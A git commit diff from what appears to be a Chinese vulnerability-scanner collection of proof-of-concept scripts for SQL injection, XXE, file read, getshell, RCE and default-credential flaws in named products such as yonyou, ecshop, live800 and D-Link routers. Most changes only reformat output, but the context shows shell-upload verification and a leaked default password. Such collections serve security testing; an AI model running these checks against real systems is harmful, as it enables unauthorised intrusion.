add sangfor exec poc

2017-07-25 23:23:16 +08:00
parent 4b70e15e1d
commit 73d10a845d
50 changed files with 152 additions and 54 deletions
--- a/cms/PKPMBS/pkpmbs_MsgList_sqli.py
+++ b/cms/PKPMBS/pkpmbs_MsgList_sqli.py
@@ -29,7 +29,7 @@ class pkpmbs_MsgList_sqli_BaseVerify:
        try:
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            if r"GAOJIMicrosoft" in req.text:
-                cprint("[+]存在pkpmbs建设工程质量监督系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red")
+                cprint("[+]存在pkpmbs建设工程质量监督系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/cms/PKPMBS/pkpmbs_addresslist_keyword_sqli.py
+++ b/cms/PKPMBS/pkpmbs_addresslist_keyword_sqli.py
@@ -29,7 +29,7 @@ class pkpmbs_addresslist_keyword_sqli_BaseVerify:
        try:
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            if r"GAOJIMicrosoft" in req.text:
-                cprint("[+]存在pkpmbs建设工程质量监督系统注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red")
+                cprint("[+]存在pkpmbs建设工程质量监督系统注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/cms/acsoft/acsoft_GetFileContent_fileread.py
+++ b/cms/acsoft/acsoft_GetFileContent_fileread.py
@@ -29,7 +29,7 @@ class acsoft_GetFileContent_fileread_BaseVerify:
        try:
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            if req.headers["Content-Type"] == "application/xml":
-                cprint("[+]存在安财软件GetFileContent任意文件读取漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red")
+                cprint("[+]存在安财软件GetFileContent任意文件读取漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/cms/acsoft/acsoft_GetFile_fileread.py
+++ b/cms/acsoft/acsoft_GetFile_fileread.py
@@ -29,7 +29,7 @@ class acsoft_GetFile_fileread_BaseVerify:
        try:
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            if req.headers["Content-Type"] == "application/xml":
-                cprint("[+]存在安财软件GetFile任意文件读取漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red")
+                cprint("[+]存在安财软件GetFile任意文件读取漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/cms/acsoft/acsoft_GetXMLList_fileread.py
+++ b/cms/acsoft/acsoft_GetXMLList_fileread.py
@@ -28,7 +28,7 @@ class acsoft_GetXMLList_fileread_BaseVerify:
        try:
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            if req.headers["Content-Type"] == "application/xml":
-                cprint("[+]存在安财软件GetXMLList任意文件读取漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red")
+                cprint("[+]存在安财软件GetXMLList任意文件读取漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/cms/autoset/autoset_phpmyadmin_unauth.py
+++ b/cms/autoset/autoset_phpmyadmin_unauth.py
@@ -7,6 +7,7 @@ author: Lucifer
 description: /phpmyadmin任意用户名密码登录,通过低权限提权可获取root密码插入shell。
 '''
 import sys
 import json
 import requests
 import warnings
 from termcolor import cprint
@@ -30,7 +31,7 @@ class autoset_phpmyadmin_unauth_BaseVerify:
        try:
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            if r"li_server_type" in req.text:
-                cprint("[+]存在韩国autoset建站程序phpmyadmin任意登录漏洞...(高危)\tpayload: "+vulnurl, "red")
+                cprint("[+]存在韩国autoset建站程序phpmyadmin任意登录漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/cms/cmseasy/cmseasy_header_detail_sqli.py
+++ b/cms/cmseasy/cmseasy_header_detail_sqli.py
@@ -30,7 +30,7 @@ class cmseasy_header_detail_sqli_BaseVerify:
        try:
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
-                cprint("[+]存在cmseasy header.php 报错注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red")
+                cprint("[+]存在cmseasy header.php 报错注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/cms/ecshop/ecshop_flow_orderid_sqli.py
+++ b/cms/ecshop/ecshop_flow_orderid_sqli.py
@@ -28,7 +28,7 @@ class ecshop_flow_orderid_sqli_BaseVerify:
        try:
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
-                cprint("[+]存在ecshop3.0 flow.php 参数order_id注入漏洞...(高危)\tpayload: "+vulnurl+ "\tpost: "+json.dumps(post_data), "red")
+                cprint("[+]存在ecshop3.0 flow.php 参数order_id注入漏洞...(高危)\tpayload: "+vulnurl+ "\npost: "+json.dumps(post_data, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/cms/eyou/eyou_admin_id_sqli.py
+++ b/cms/eyou/eyou_admin_id_sqli.py
@@ -30,7 +30,7 @@ class eyou_admin_id_sqli_BaseVerify:
        try:
            req = requests.post(vulnurl, headers=headers, data=payload, timeout=10, verify=False)
            if time.time() - start_time >= 6:
-                cprint("[+]存在亿邮Defender系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(payload), "red")
+                cprint("[+]存在亿邮Defender系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(payload, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/cms/gobetters/gobetters_multi_sqli.py
+++ b/cms/gobetters/gobetters_multi_sqli.py
@@ -55,7 +55,7 @@ class gobetters_multi_sqli_BaseVerify:
            }
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
-                    cprint("[+]存在Gobetters视频会议系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red")
+                    cprint("[+]存在Gobetters视频会议系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
            vulnurl = self.url + "/web/department/departmentsave.php"
            post_data = {
@@ -66,7 +66,7 @@ class gobetters_multi_sqli_BaseVerify:
            }
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
-                    cprint("[+]存在Gobetters视频会议系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red")
+                    cprint("[+]存在Gobetters视频会议系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
            vulnurl = self.url + "/web/monitor/monitormentsave.php"
            post_data = {
@@ -77,7 +77,7 @@ class gobetters_multi_sqli_BaseVerify:
            }
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
-                    cprint("[+]存在Gobetters视频会议系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red")
+                    cprint("[+]存在Gobetters视频会议系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
            vulnurl = self.url + "/web/users/result.php"
            post_data = {
@@ -85,7 +85,7 @@ class gobetters_multi_sqli_BaseVerify:
            }
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
-                    cprint("[+]存在Gobetters视频会议系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red")
+                    cprint("[+]存在Gobetters视频会议系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/cms/kxmail/kxmail_login_server_sqli.py
+++ b/cms/kxmail/kxmail_login_server_sqli.py
@@ -32,7 +32,7 @@ class kxmail_login_server_sqli_BaseVerify:
        try:
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            if time.time() - start_time >= 6:
-                cprint("[+]存在科信邮件系统login.server.php 时间盲注漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red")
+                cprint("[+]存在科信邮件系统login.server.php 时间盲注漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/cms/live800/live800_services_xxe.py
+++ b/cms/live800/live800_services_xxe.py
@@ -7,6 +7,7 @@ author: Lucifer
 description: live800使用了xfire实现webservice,xfire存在一个XXE，可以直接利用获取远程敏感文件信息。
 '''
 import sys
 import json
 import requests
 import warnings
 from termcolor import cprint
@@ -46,7 +47,7 @@ class live800_services_xxe_BaseVerify():
            try:
                req = requests.post(vulnurl, headers=headers, data=post_data, timeout=10, verify=False)
                if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
-                    cprint("[+]存在live800在线客服系统XML实体注入漏洞...(高危)\tpayload: "+vulnurl+"\t\tpost: "+post_data, "red")
+                    cprint("[+]存在live800在线客服系统XML实体注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
            except:
                cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/cms/live800/live800_sta_export_sqli.py
+++ b/cms/live800/live800_sta_export_sqli.py
@@ -42,7 +42,7 @@ class live800_sta_export_sqli_BaseVerify:
            req = requests.post(vulnurl, headers=headers, data=payload, timeout=10, verify=False)
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
-                cprint("[+]存在live800在线客服系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(payload), "red")
+                cprint("[+]存在live800在线客服系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(payload, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
@@ -69,7 +69,7 @@ class live800_sta_export_sqli_BaseVerify:
            req = requests.post(vulnurl, headers=headers, data=payload, timeout=10, verify=False)
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
-                cprint("[+]存在live800在线客服系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(payload), "red")
+                cprint("[+]存在live800在线客服系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(payload, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
@@ -89,7 +89,7 @@ class live800_sta_export_sqli_BaseVerify:
            req = requests.post(vulnurl, headers=headers, data=payload, timeout=10, verify=False)
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
-                cprint("[+]存在live800在线客服系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(payload), "red")
+                cprint("[+]存在live800在线客服系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(payload, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
@@ -109,7 +109,7 @@ class live800_sta_export_sqli_BaseVerify:
            req = requests.post(vulnurl, headers=headers, data=payload, timeout=10, verify=False)
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
-                cprint("[+]存在live800在线客服系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(payload), "red")
+                cprint("[+]存在live800在线客服系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(payload, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/cms/opensns/opensns_index_getshell.py
+++ b/cms/opensns/opensns_index_getshell.py
@@ -31,7 +31,7 @@ class opensns_index_getshell_BaseVerify:
            shellurl = req.text[pos::].replace("\\","").strip('"}')
            req2 = requests.get(shellurl, headers=headers, timeout=10, verify=False)
            if r"Configuration File (php.ini) Path" in req2.text:
-                cprint("[+]存在opensns index.php 前台getshell漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data)+"\tshell地址: "+shellurl, "red")
+                cprint("[+]存在opensns index.php 前台getshell漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4)+"\nshell地址: "+shellurl, "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/cms/others/clib_kindaction_fileread.py
+++ b/cms/others/clib_kindaction_fileread.py
@@ -35,7 +35,7 @@ class clib_kindaction_fileread_BaseVerify:
        try:
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            if req.status_code == 200 and r"system" in req.text:
-                cprint("[+]存在五车图书管系统kindaction任意文件遍历漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red")
+                cprint("[+]存在五车图书管系统kindaction任意文件遍历漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/cms/others/eis_menu_left_edit_sqli.py
+++ b/cms/others/eis_menu_left_edit_sqli.py
@@ -30,7 +30,7 @@ class eis_menu_left_edit_sqli_BaseVerify:
        try:
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
-                cprint("[+]存在蓝凌EIS智慧协同平台menu_left_edit.aspx SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red")
+                cprint("[+]存在蓝凌EIS智慧协同平台menu_left_edit.aspx SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/cms/others/hjsoft_sqli.py
+++ b/cms/others/hjsoft_sqli.py
@@ -50,7 +50,7 @@ class hjsoft_sqli_BaseVerify:
        try:
            req2 = requests.post(post_url, headers=headers, data=post_data, timeout=10, verify=False)
            if time.time() - start_time >= 6:
-                cprint("[+]存在宏景EHR系统 SQL注入漏洞...(高危)\t\tpayload: "+post_url+"\tpost: "+json.dumps(post_data), "red")
+                cprint("[+]存在宏景EHR系统 SQL注入漏洞...(高危)\t\tpayload: "+post_url+"\npost: "+json.dumps(post_data, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/cms/others/mainone_SupplyList_sqli.py
+++ b/cms/others/mainone_SupplyList_sqli.py
@@ -28,7 +28,7 @@ class mainone_SupplyList_sqli_BaseVerify:
        try:
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            if r"JIMicrosoft" in req.text:
-                cprint("[+]存在铭万B2B SupplyList SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red")
+                cprint("[+]存在铭万B2B SupplyList SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/cms/phpmyadmin/phpmyadmin_setup_lfi.py
+++ b/cms/phpmyadmin/phpmyadmin_setup_lfi.py
@@ -29,7 +29,7 @@ class phpmyadmin_setup_lfi_BaseVerify:
        try:
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            if r"boot loader" in req.text:
-                cprint("[+]存在PhpMyAdmin2.8.0.3无需登录任意文件包含导致代码执行漏洞(WINDOWS)...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red")
+                cprint("[+]存在PhpMyAdmin2.8.0.3无需登录任意文件包含导致代码执行漏洞(WINDOWS)...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/cms/qibocms/qibocms_search_code_exec.py
+++ b/cms/qibocms/qibocms_search_code_exec.py
@@ -30,7 +30,7 @@ class qibocms_search_code_exec_BaseVerify:
            }
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            if r"Configuration File (php.ini) Path" in req.text:
-                cprint("[+]存在qibo分类系统search.php 代码执行漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red")
+                cprint("[+]存在qibo分类系统search.php 代码执行漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/cms/seacms/seacms_order_code_exec.py
+++ b/cms/seacms/seacms_order_code_exec.py
@@ -31,7 +31,7 @@ class seacms_order_code_exec_BaseVerify:
        try:
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            if r"comment.php" in req.text:
-                cprint("[+]存在seacms 6.45 search.php order参数前台代码执行漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red")
+                cprint("[+]存在seacms 6.45 search.php order参数前台代码执行漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/cms/trs/trs_infogate_register.py
+++ b/cms/trs/trs_infogate_register.py
@@ -28,7 +28,7 @@ class trs_infogate_register_BaseVerify:
        try:
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            if r"CUSTOMERUSER" in req.text and r"CUSTOMERUSERID" in req.text:
-                cprint("[+]存在trs infogate插件 任意注册漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red")
+                cprint("[+]存在trs infogate插件 任意注册漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/cms/trs/trs_infogate_xxe.py
+++ b/cms/trs/trs_infogate_xxe.py
@@ -35,7 +35,7 @@ class trs_infogate_xxe_BaseVerify:
            time.sleep(6)
            reqr = requests.get(eye_url, headers=headers, timeout=10, verify=False)
            if md5_str in reqr.text:
-                cprint("[+]存在trs infogate插件 XML实体注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red")
+                cprint("[+]存在trs infogate插件 XML实体注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/cms/trs/trs_lunwen_papercon_sqli.py
+++ b/cms/trs/trs_lunwen_papercon_sqli.py
@@ -34,7 +34,7 @@ class trs_lunwen_papercon_sqli_BaseVerify:
        try:
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            if time.time() - start_time >= 6:
-                cprint("[+]存在TRS学位论文系统papercon处SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red")
+                cprint("[+]存在TRS学位论文系统papercon处SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/cms/trs/trs_wcm_default_user.py
+++ b/cms/trs/trs_wcm_default_user.py
@@ -7,6 +7,7 @@ author: Lucifer
 description: TRS wcm系统中存在"依申请公开"这个默认用户,默认密码是trsadmin,可直接登录。
 '''
 import sys
 import json
 import requests
 import warnings
 from termcolor import cprint
@@ -30,7 +31,7 @@ class trs_wcm_default_user_BaseVerify:
        try:
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            if r"WCM IMPORTS BEGIN" in req.text and r"main.jsp" in req.text:
-                cprint("[+]存在TRS wcm系统默认账户漏洞...(高危)\tpayload: "+vulnurl+"\tpost: 依申请公开:trsadmin", "red")
+                cprint("[+]存在TRS wcm系统默认账户漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/cms/umail/umail_sessionid_access.py
+++ b/cms/umail/umail_sessionid_access.py
@@ -29,7 +29,7 @@ class umail_sessionid_access_BaseVerify:
        try:
            req = requests.post(vulnurl, headers=headers, data=post_data, timeout=10, verify=False)
            if r'<meta http-equiv="refresh" content="0; URL=index.php">' in req.text:
-                cprint("[+]存在umail sessionid登录漏洞...(中危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "yellow") 
+                cprint("[+]存在umail sessionid登录漏洞...(中危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "yellow") 
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/cms/wizbank/wizbank_usr_id_sqli.py
+++ b/cms/wizbank/wizbank_usr_id_sqli.py
@@ -35,7 +35,7 @@ class wizbank_usr_id_sqli_BaseVerify:
        if r"true" in reqlst[0] and r"false" in reqlst[1]:
            if len(req.text) < 50:
-                cprint("[+]存在wizBank学习系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(payload), "red")
+                cprint("[+]存在wizBank学习系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(payload, indent=4), "red")
 if __name__ == "__main__":
    warnings.filterwarnings("ignore")
--- a/cms/wordpress/wordpress_plugin_mailpress_rce.py
+++ b/cms/wordpress/wordpress_plugin_mailpress_rce.py
@@ -48,7 +48,7 @@ class wordpress_plugin_mailpress_rce_BaseVerify:
            shellurl = self.url + "/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id="+searchid
            req2 = requests.get(shellurl, headers=headers, timeout=10, verify=False)
            if r"Configuration File (php.ini) Path" in req2.text:
-                cprint("[+]存在wordpress 插件mailpress远程代码执行漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data)+"\tshellurl: "+shellurl, "red")
+                cprint("[+]存在wordpress 插件mailpress远程代码执行漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4)+"\nshellurl: "+shellurl, "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/cms/wordpress/wordpress_restapi_sqli.py
+++ b/cms/wordpress/wordpress_restapi_sqli.py
@@ -40,8 +40,7 @@ class wordpress_restapi_sqli_BaseVerify:
            if status != 401 and status != 400:
                cprint("[+]存在wordpress rest api权限失效导致内容注入漏洞...(高危)\tpayload: "+vulnurl, "red")
-        except Exception as e:
+        except:
            print(e)
            cprint("[-] "+__file__+"====>连接超时", "cyan")
 if __name__ == "__main__":
--- a/cms/xplus/xplus_2003_getshell.py
+++ b/cms/xplus/xplus_2003_getshell.py
@@ -34,7 +34,7 @@ class xplus_2003_getshell_BaseVerify:
            verifyurl = self.url + "/shtml/php.php;.shtml"
            req2 = requests.get(verifyurl, headers=headers, timeout=10, verify=False)
            if req2.status_code == 200 and r"81dc9bdb52d04dc20036dbd8313ed055" in req2.text:
-                cprint("[+]存在xplus npmaker 2003系统GETSHELL漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red")
+                cprint("[+]存在xplus npmaker 2003系统GETSHELL漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/cms/yonyou/yonyou_a8_CmxUser_sqli.py
+++ b/cms/yonyou/yonyou_a8_CmxUser_sqli.py
@@ -31,7 +31,7 @@ class yonyou_a8_CmxUser_sqli_BaseVerify:
        try:
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            if time.time() - start_time >= 6:
-                cprint("[+]存在用友优普a8 CmxUserSQL时间盲注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red")
+                cprint("[+]存在用友优普a8 CmxUserSQL时间盲注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/cms/yonyou/yonyou_a8_personService_xxe.py
+++ b/cms/yonyou/yonyou_a8_personService_xxe.py
@@ -37,7 +37,7 @@ class yonyou_a8_personService_xxe_BaseVerify:
            time.sleep(6)
            reqr = requests.get(eye_url, timeout=10, verify=False)
            if md5_str in reqr.text:
-                cprint("[+]存在用友致远A8协同系统 Blind XML实体注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red")
+                cprint("[+]存在用友致远A8协同系统 Blind XML实体注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/cms/yonyou/yonyou_ehr_resetpwd_sqli.py
+++ b/cms/yonyou/yonyou_ehr_resetpwd_sqli.py
@@ -33,7 +33,7 @@ class yonyou_ehr_resetpwd_sqli_BaseVerify:
        try:
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            if time.time() - start_time >= 6:
-                cprint("[+]存在用友EHR系统 ResetPwd.jsp SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red")
+                cprint("[+]存在用友EHR系统 ResetPwd.jsp SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/cms/yonyou/yonyou_status_default_pwd.py
+++ b/cms/yonyou/yonyou_status_default_pwd.py
@@ -28,7 +28,7 @@ class yonyou_status_default_pwd_BaseVerify:
                vulnurl = self.url + payload
                req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
                if r"A8 Management Monitor" in req.text and r"Connections Stack Trace" in req.text:
-                    cprint("[+]存在用友a8监控后台默认密码漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red")
+                    cprint("[+]存在用友a8监控后台默认密码漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/cms/yonyou/yonyou_u8_CmxItem_sqli.py
+++ b/cms/yonyou/yonyou_u8_CmxItem_sqli.py
@@ -30,7 +30,7 @@ class yonyou_u8_CmxItem_sqli_BaseVerify:
        try:
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            if time.time() - start_time >= 6:
-                cprint("[+]存在用友u8 CmxItem.php SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red")
+                cprint("[+]存在用友u8 CmxItem.php SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/hardware/router/router_dlink_command_exec.py
+++ b/hardware/router/router_dlink_command_exec.py
@@ -34,7 +34,7 @@ class router_dlink_command_exec_BaseVerify():
        try:
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            if r"<report>OK" in req.text:
-                cprint("[+]存在Dlink DIAGNOSTIC.PHP命令执行漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red")
+                cprint("[+]存在Dlink DIAGNOSTIC.PHP命令执行漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/industrial/zte_wireless_getChannelByCountryCode_sqli.py
+++ b/industrial/zte_wireless_getChannelByCountryCode_sqli.py
@@ -28,7 +28,7 @@ class zte_wireless_getChannelByCountryCode_sqli_BaseVerify:
        try:
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            if r"~~~" in req.text:
-                cprint("[+]存在zte 无线控制器 SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red")
+                cprint("[+]存在zte 无线控制器 SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
--- a/information/apache_server_status_disclosure.py
+++ b/information/apache_server_status_disclosure.py
@@ -0,0 +1,35 @@
 #!/usr/bin/env python
 # -*- coding: utf-8 -*-
 '''
 name: apache server-status信息泄露
 referer: unknown
 author: Lucifer
 description: apache的状态信息文件泄露。
 '''
 import sys
 import requests
 import warnings
 from termcolor import cprint
 class apache_server_status_disclosure_BaseVerify:
    def __init__(self, url):
        self.url = url
    def run(self):
        headers = {
